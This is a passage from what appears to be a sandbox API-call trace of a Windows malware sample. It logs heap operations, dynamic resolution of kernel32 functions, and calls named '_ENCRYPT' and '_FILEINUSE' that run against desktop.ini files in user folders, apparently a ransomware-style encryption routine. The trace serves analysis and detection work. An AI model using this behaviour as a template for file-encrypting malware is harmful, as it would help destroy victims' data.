RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0191.938] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0191.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0191.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.939] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.940] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0191.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0191.940] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.940] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.940] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0191.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.941] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.941] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.942] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.942] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0191.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0191.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.942] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0191.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0191.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.943] CloseHandle (hObject=0x158) returned 1 [0191.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0191.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.943] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.943] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0191.943] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.944] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.944] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.944] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.944] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.944] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.944] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.944] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.944] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.945] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.945] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.945] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0191.945] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.945] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.945] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 0x90add8 [0191.946] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.946] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.946] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.946] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.946] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.946] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.946] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.946] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.946] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.946] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.946] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.947] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.952] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.952] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.952] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.952] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.952] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.952] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.952] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.952] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.952] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.952] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.952] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.952] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.952] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 